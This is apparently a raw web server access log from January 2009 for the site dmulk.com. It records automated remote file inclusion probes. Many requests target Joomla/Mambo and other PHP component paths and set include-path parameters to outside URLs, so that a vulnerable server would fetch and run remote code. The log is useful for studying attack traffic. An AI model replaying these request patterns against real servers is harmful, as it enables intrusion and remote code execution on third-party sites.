89.111.180.85 - - [06/Jan/2009:08:19:45 -0800] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:46 -0800] "GET /logs/access_080530.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:46 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:46 -0800] "GET /logs/access_080530.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:46 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:47 -0800] "GET /logs/access_080530.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:47 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:47 -0800] "GET /logs/access_080530.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:47 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:48 -0800] "GET /logs/access_080530.log%20%20//components/com_simpleboard/image_upload.php?sbp=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:48 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:48 -0800] "GET /logs/access_080530.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:19:48 -0800] "GET /logs/access_080404.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:48 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:49 -0800] "GET /logs/access_080530.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:49 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:49 -0800] "GET /logs/access_080530.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:49 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:50 -0800] "GET /logs/access_080530.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:50 -0800] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:50 -0800] "GET /logs/access_080530.log%20%20//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:50 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:50 -0800] "GET /logs/access_080530.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:51 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:51 -0800] "GET /logs/access_080530.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:51 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:51 -0800] "GET /logs/access_080530.log%20%20//components/minibb/index.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:52 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:52 -0800] "GET /logs/access_080530.log%20%20//database.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:52 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:52 -0800] "GET /logs/access_080530.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:53 -0800] "GET /logs//components/minibb/index.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:53 -0800] "GET /logs/access_080530.log%20%20//includes/adminAvatars.php?GlobalSettings[templatesDirectory]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:53 -0800] "GET /logs//database.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:53 -0800] "GET /logs/access_080530.log%20%20//includes/adminSmileys.php?GlobalSettings[templatesDirectory]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:54 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:54 -0800] "GET /logs/access_080530.log%20%20//includes/functions_cms.php?phpbb_root_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:54 -0800] "GET /logs//includes/adminAvatars.php?GlobalSettings[templatesDirectory]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:54 -0800] "GET /logs/access_080530.log%20%20//includes/move.php?GlobalSettings[templatesDirectory]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:55 -0800] "GET /logs//includes/adminSmileys.php?GlobalSettings[templatesDirectory]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:55 -0800] "GET /logs/access_080530.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:55 -0800] "GET /logs//includes/functions_cms.php?phpbb_root_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:55 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:55 -0800] "GET /logs//includes/move.php?GlobalSettings[templatesDirectory]=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:56 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:56 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:56 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:56 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:57 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:57 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:57 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:57 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:58 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:58 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:58 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:58 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:58 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:59 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:59 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:59 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:19:59 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:00 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:00 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:00 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:20:00 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:00 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:20:00 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:20:00 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:01 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:01 -0800] "GET /logs/access_080530.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:01 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:01 -0800] "GET /logs/access_080530.log%20%20//index2.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:02 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:02 -0800] "GET /logs/access_080530.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:02 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:02 -0800] "GET /logs/access_080530.log%20%20//mod_cbsms_messages.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:03 -0800] "GET /logs//index2.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:03 -0800] "GET /logs/access_080530.log%20%20//modules/calendar/mod_calendar.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:03 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:03 -0800] "GET /logs/access_080530.log%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:03 -0800] "GET /logs//mod_cbsms_messages.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:04 -0800] "GET /logs/access_080530.log%20%20//modules/mod_as_category.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:04 -0800] "GET /logs//modules/calendar/mod_calendar.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:04 -0800] "GET /logs/access_080530.log%20%20//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:04 -0800] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:04 -0800] "GET /logs/access_080530.log%20%20//modules/mod_calendar.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:05 -0800] "GET /logs//modules/mod_as_category.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:05 -0800] "GET /logs/access_080530.log%20%20//modules/mod_header_image.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:05 -0800] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:05 -0800] "GET /logs/access_080530.log%20%20//modules/mod_mainmenu.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:06 -0800] "GET /logs//modules/mod_calendar.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:06 -0800] "GET /logs/access_080530.log%20%20//modules/mod_weather.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:06 -0800] "GET /logs//modules/mod_header_image.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:06 -0800] "GET /logs/access_080530.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:07 -0800] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:07 -0800] "GET /logs/access_080530.log%20%20//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:07 -0800] "GET /logs//modules/mod_weather.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:08 -0800] "GET /logs//templates/be2004-2/index.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:20:08 -0800] "GET /logs//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:20:08 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://rdhiphop.com/error_log%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:20:09 -0800] "GET /logs//?path%5Bdocroot%5D=http://rdhiphop.com/error_log%0D?? HTTP/1.1" 200 81177 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:20:10 -0800] "GET /?path%5Bdocroot%5D=http://rdhiphop.com/error_log%0D?? HTTP/1.1" 200 94714 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:20:14 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://rdhiphop.com/error_log%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:20:26 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.149.17.55 - - [06/Jan/2009:08:20:51 -0800] "GET ///?_PHPLIB[libdir]=http://www.vampirewear.com/11.gif??? HTTP/1.1" 200 94752 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.157 - - [06/Jan/2009:08:21:02 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://www.geocities.com/xzfru/perl/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.157 - - [06/Jan/2009:08:21:02 -0800] "GET /phphtml.php?htmlclass_path=http://www.geocities.com/xzfru/perl/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.157 - - [06/Jan/2009:08:21:02 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.geocities.com/xzfru/perl/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.157 - - [06/Jan/2009:08:21:12 -0800] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.geocities.com/xzfru/perl/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
